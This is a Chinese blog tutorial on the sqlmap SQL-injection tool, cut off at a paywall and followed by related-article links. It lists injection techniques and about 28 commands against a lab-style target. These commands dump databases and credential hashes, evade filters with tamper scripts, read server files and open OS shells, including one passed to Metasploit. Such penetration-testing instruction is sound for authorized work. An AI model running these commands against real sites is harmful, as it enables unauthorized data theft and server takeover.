渗透利器-sqlmap超级详解

最新推荐文章于 2025-05-19 21:13:58 发布
最新推荐文章于 2025-05-19 21:13:58 发布
阅读量5.6k 收藏 60
点赞数 13
CC 4.0 BY-SA版权
分类专栏: 工具使用 文章标签: 数据库 microsoft database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47418965/article/details/121208978

目录

0X01 背景介绍

0X02 原理简述

0X03 参数说明

0X04 实战举例

0X05  高级用法

0X06 总结

0X01 背景介绍

        官网:http://sqlmap.org

        目前支持的数据库有:Altibase,Apache Derby, CrateDB, Cubrid, Firebird, FrontBase, H2, HSQLDB, IBM DB2, Informix, InterSystems Cache, Mckoi, Microsoft Access, Microsoft SQL Server, MimerSQL, MonetDB, MySQL, Oracle, PostgreSQL, Presto, SAP MaxDB, SQLite, Sybase, Vertica, eXtremeDB等

        Sqlmap采用了以下5种独特的SQL注入技术:

  • 基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入
  • 基于时间的盲注,即不能根据页面返回的内容判断任何信息,要用条件语句查看时间延迟语句是否已经执行(即页面返回时间是否增加)来判断
  • 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中
  • 联合查询注入,在可以使用Union的情况下注入
  • 堆查询注入,可以同时执行多条语句时的注入

        Sqlmap的强大的功能还包括:

  1. 数据库指纹识别
  2. 数据库名枚举
  3. 数据提取
  4. 访问目标文件系统,getshell

0X02 原理简述

        工作流程结构图:

        推荐sqlmap详细原理博客:SQLMAP 流程分析 - 简书

0X03 参数说明

1、sqlmap -r http.txt  # http.txt是我们抓取的http的请求包
2、sqlmap -r http.txt -p username  # 指定参数,当有多个参数而你又知道username参数存在SQL漏洞,你就可以使用-p指定参数进行探测
3、sqlmap -u "http://www.xxxxx.com/username/admin*"       # 如果我们已经知道admin这里是注入点的话,可以在其后面加个*来让sqlmap对其注入
4、sqlmap -u "http://192.168.1.1/Less-1/?id=1"   # 探测该url是否存在漏洞
5、sqlmap -u "http://192.168.1.1/Less-1/?id=1"   --cookie="抓取的cookie"   # 当该网站需要登录时,探测该url是否存在漏洞
6、sqlmap -u "http://192.168.1.1/Less-1/?id=1"  --data="uname=admin&passwd=admin&submit=Submit"  # 抓取其post提交的data数据填入
7、sqlmap -u "http://192.168.1.1/Less-1/?id=1" --users      # 查看数据库的所有用户
8、sqlmap -u "http://192.168.1.1/Less-1/?id=1" --passwords  # 查看数据库用户名的密码
    有时候使用 --passwords 不能获取到密码,则可以试下:
        -D mysql -T user -C host,user,password --dump  # 当MySQL< 5.7时
        -D mysql -T user -C host,user,authentication_string --dump  # 当MySQL>= 5.7时
9、sqlmap -u "http://192.168.1.1/Less-1/?id=1" --current-user  # 查看数据库当前的用户
10、sqlmap -u "http://192.168.1.1/Less-1/?id=1" --is-dba    # 判断当前用户是否有管理员权限
11、sqlmap -u "http://192.168.1.1/Less-1/?id=1" --roles   # 列出数据库所有管理员角色,仅适用于oracle数据库的时候 
12、sqlmap -u "http://192.168.1.1/Less-1/?id=1" --dbs        # 爆出所有的数据库
13、sqlmap -u "http://192.168.1.1/Less-1/?id=1" --tables     # 爆出所有的数据表
14、sqlmap -u "http://192.168.1.1/Less-1/?id=1" --columns    # 爆出数据库中所有的列
15、sqlmap -u "http://192.168.1.1/Less-1/?id=1" --current-db # 查看当前的数据库
16、sqlmap -u "http://192.168.1.1/Less-1/?id=1" -D security --tables # 爆出数据库security中的所有的表
17、sqlmap -u "http://192.168.1.1/Less-1/?id=1" -D security -T users --columns # 爆出security数据库中users表中的所有的列
18、sqlmap -u "http://192.168.1.1/Less-1/?id=1" -D security -T users -C username --dump  # 爆出数据库security中的users表中的username列中的所有数据
19、sqlmap -u "http://192.168.1.1/Less-1/?id=1" -D security -T users -C username --dump --start 1 --stop 100  # 爆出数据库security中的users表中的username列中的前100条数据
20、sqlmap -u "http://192.168.1.1/Less-1/?id=1" -D security -T users --dump-all # 爆出数据库security中的users表中的所有数据
21、sqlmap -u "http://192.168.1.1/Less-1/?id=1" -D security --dump-all   # 爆出数据库security中的所有数据
22、sqlmap -u "http://192.168.1.1/Less-1/?id=1" --dump-all  # 爆出该数据库中的所有数据
23、sqlmap -u "http://192.168.1.1/Less-1/?id=1"  --tamper=space2comment.py  # 指定脚本进行过滤,用/**/代替空格
24、sqlmap -u "http://192.168.1.1/Less-4/?id=1" --level=5 --risk=3 # 探测等级5,平台危险等级3,都是最高级别。当level=2时,会测试cookie注入。当level=3时,会测试user-agent/referer注入。
25、sqlmap -u "http://192.168.1.1/Less-1/?id=1" --sql-shell  # 执行指定的sql语句
26、sqlmap -u "http://192.168.1.1/Less-4/?id=1" --os-shell/--os-cmd   # 执行--os-shell命令,获取目标服务器权限
27、sqlmap -u "http://192.168.1.1/Less-4/?id=1" --os-pwn   # 执行--os-pwn命令,将目标权限弹到MSF上 
28、sqlmap -u "http://192.168.1.1/Less-4/?id=1" --file-read "D:/test.txt" # 读取目标服务器D盘下的test.txt文件
29、sqlmap -u "http:
最低0.47元/天 解锁文章

200万优质内容无限畅学
sqlmap超详细讲解
A485860941的博客
04-13 3万+
sqlmap超详细讲解,不看后悔一辈子,据说百分之99的人看了都夸赞.
sqlmap的详细介绍
m0_59324968的博客
02-03 1895
sqlmap的详细介绍
SQL注入——Sqlmap工具使用
最新发布
2402_84408069的博客
05-19 1252
Sqlmap是一款基于Python开发的开源渗透测试工具,主要用于自动化检测和利用SQL注入漏洞,从而获取数据库服务器的权限。它支持多种数据库类型,能够提取数据库中的数据、访问操作系统文件,甚至通过外带数据连接执行操作系统命令。使用Sqlmap前需配置Python环境,可通过官网或GitHub下载工具。基本使用方法包括进入Sqlmap目录、执行命令查看帮助信息,并通过指定URL进行注入测试。常用技巧包括GET型注入、POST型注入和HEAD头注入,支持自动化测试、获取数据库名、表名、列名及数据等操作。
SQLMap详解
weixin_38847963的博客
01-07 1992
sqlmap是一个自动化的sql注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB。sqlmap采用了以下5种独特的SQL注入技术。·基于布尔类型的盲注,即可以根据页面判断条件真假的注入。
sqlmap 详解
weixin_38167847的博客
08-08 258
sqlmap 使用总结 0x01 需要了解 当给 sqlmap 这么一个 url 的时候,它会:1、判断可注入的参数 2、判断可以用那种 SQL 注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 sqlmap 支持五种不同的注入模式:1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即...
sqlmapproject-sqlmap-1.5.3-24-gbce3abc.zip
03-28
SQLMap数据库安全检测利器详解SQLMap是一款强大的、自动化的SQL注入工具,用于检测和利用SQL注入漏洞,并最终获取目标数据库的完全控制权。在这个“sqlmapproject-sqlmap-1.5.3-24-gbce3abc.zip”压缩包中,...
sqlmap渗透测试利器详解
"这篇文档是关于sqlmap的使用教程,主要针对中文用户,强调了sqlmap在SQL注入工具中的优越性,并提供了测试环境和不同版本的更新方式。文档还介绍了sqlmap的一些基本命令和信息获取功能。" sqlmap是一款强大的自动...
sqlmap-master
06-23
**SQLMap渗透测试利器** SQLMap是一款自动化SQL注入工具,用于检测和利用SQL注入漏洞,从而控制系统数据库。它的设计目标是帮助安全专家和渗透测试人员有效地发现和利用Web应用程序中的SQL注入漏洞,以实现数据库...
sqlmap-0.9-3473
08-22
SQLMap渗透测试人员和安全研究人员的利器,因为它可以帮助他们在合法的背景下发现并解决潜在的安全问题。 在压缩包内的文件"sqlmapproject-sqlmap-3e024ac",我们可以推测这可能是SQLMap项目的源代码或特定构建...
sqlmap详解
xj28555的博客
06-29 2204
常见注入方式 GET注入 sqlmap.py -u "url" 检测存在不存在注入 sqlmap.py -u "url" --tables 列出数据库的表 sqlmap.py -u "url" --columns -T admin 列出admin的内容 sqlmap.py -u "url" --dump -T admin "useradmin,password" 列出useradmin password的内容 POST注入 sqlmap.py -u "www.xxx...
SQLmap使用指令详解
06-12
SQLmap是一款网络安全检测工具 支持现在几乎所有的数据库,比国内的任何工具都强。 支持get,post ,cookie注入。可以添加cookie和user-agent 支持盲注,错误回显注入,还有其他多种注入方法。 支持代理, 优化算法,更高效。 指纹识别技术判断数据库
SQLMAP工具详解
weixin_56218159的博客
06-02 1万+
免责声明 该文章仅用于信息防御技术的交流和学习,请勿用于其他用途; 在未得到网站授权前提下,禁止对政府、事业单位、企业或其他单位网站及系统进行渗透测试;技术是把双刃剑,请遵纪守法,做一名合格的白帽子安全专家,为国家的网络安全事业做出贡献; ...
SQLMap使用详解
热门推荐
未完成的歌~的博客
02-19 2万+
文章目录前言:一、SQLMap介绍1、Sqlmap简介:2、Sqlmap支持的注入方式:二、SQLMap安装三、SQLMap使用:1、判断是否存在注入:2、判断文本中的请求是否存在注入:3、查询当前用户下的所有数据库:4、获取数据库中的表名:5、获取表中的字段名:6、获取字段内容:7、获取数据库的所有用户:8、获取数据库用户的密码:9、获取当前网站数据库的名称:10、获取当前网站数据库的用户名称:四、SQLMap进阶:参数讲解1、-- level 5:探测等级2、-- is-dba:当前用户是否为管理权限3
SQLMap 使用详解
06-01 1419
sqlmap是一个常用的自动化SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,并且内置了很多绕过插件,支持很多种数据库。 这里使用BUUCTF提供的sqli=-
渗透工具- SQLMap
LJH1999ZN的博客
02-13 728
一、sqlmap的介绍
sqlmap的基本和扩展功能的使用详解(具体操作+图解)
weixin_46709219的博客
11-14 2638
一)sqlmap介绍: sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等。 Sqlmap的强大的功能包括 数据库指纹识别、数据库枚举、数据提取、访问目标文件系统,并在获取完全的操作权限时执行任意命令。 Sqlmap采用了以下的SQL注入技术 1) 基于布尔类型的盲注,即可以根据
SQLMAP基本应用详解(实战演示)
刘桂香263的博客
07-31 5444
SQLMAP自动化注入工具具有扫描、发现并利用给定的URL的SQL漏洞。
渗透常用工具-SQLMap
beirry的博客
05-08 1309
sqlmap 是用python编写的渗透测试工具,可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。通常检测到存在sql注入点时,就可以利用此工具来进行验证。 下载使用 SQLMap下载地址:https://sqlmap.org/#download Python下载地址:https://www.python.org/downloads/ 根据以上下载地址来获取安装包 SQLmap: Python: 下载完后安装即可使用。 使用方法 打开sqlmap所在目录,打开命令行。 在命令行中输入pyt
iBATIS-SQLMap快速入门与配置详解
- 开发者使用XML文件定义SQL Map,其中包含了`<sqlMap>`元素,它包含多个`<mappedStatement>`元素,每个映射对应一条SQL查询。 - Java程序通过调用预定义的方法或接口执行这些映射,框架会根据映射规则动态生成并...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值